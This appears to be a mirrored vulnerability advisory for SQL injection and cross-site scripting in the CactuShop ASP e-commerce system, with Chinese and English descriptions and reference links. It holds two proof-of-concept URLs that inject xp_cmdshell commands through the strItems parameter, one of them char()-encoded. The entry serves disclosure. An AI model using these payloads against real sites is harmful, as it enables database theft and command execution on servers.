https://www.exploit-db.com/exploits/23898
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-487

CactuShop是一款基于ASP的电子商务系统。CactuShop不充分过滤用户提交的URI参数，远程攻击者可以利用这个漏洞进行SQL注入攻击，可获得敏感信息或更改数据库。’mailorder.asp’和’payonline.asp’脚本对用户提供给’strItems’参数的数据，在用户SQL查询时缺少充分过滤，提交包含恶意SQL命令数据给’strItems’参数，可更改原有数据库逻辑，获得敏感信息或更改数据库。另外’largeimage.asp’脚本存在跨站脚本执行问题，可获得用户会话ID及访问用户个人数据。

source: http://www.securityfocus.com/bid/10019/info

Reportedly CactuShop is prone to a remote SQL injection vulnerability. This issue is due to a failure to properly sanitize user-supplied URI input before using it to craft an SQL query.

As a result of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue. 

http://www.example.com/payonline.asp/[email protected]&CD_Password=&CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&numCurrencyID=1&numItemCount=2&strItems=214;+exec+master..xp_cmdshell+'dir+c:'--z165z&strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed

http://www.example.com/payonline.asp/strAgain=yes&[email protected]&CD_Password=&CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&numCurrencyID=1&numItemCount=2&strItems=214;declare%20@a%20sysname%20set%20@a%20=%20char(100)%2bchar(105)%2bchar(114)%2bchar(32)%2bchar(99)%2bchar(58)%20exec%20master..xp_cmdshell%20@a;--z165z&strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed

来源:SECUNIA
名称:11272
链接:http://secunia.com/advisories/11272
来源:XF
名称:cactushop-multiple-sql-injection(15686)
链接:http://xforce.iss.net/xforce/xfdb/15686
来源:BID
名称:10019
链接:http://www.securityfocus.com/bid/10019
来源:www.s-quadra.com
链接:http://www.s-quadra.com/advisories/Adv-20040331.txt
来源:OSVDB
名称:4786
链接:http://www.osvdb.org/4786
来源:OSVDB
名称:4785
链接:http://www.osvdb.org/4785
来源:SECTRACK
名称:1009601
链接:http://securitytracker.com/id?1009601
来源:BUGTRAQ
名称:20040331CactuSoftCactuShopv5.xshoppingcartsoftwaremultiplesecurity
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108075059013762&w;=2
来源：NSFOCUS
名称：6262
链接：http://www.nsfocus.net/vulndb/6262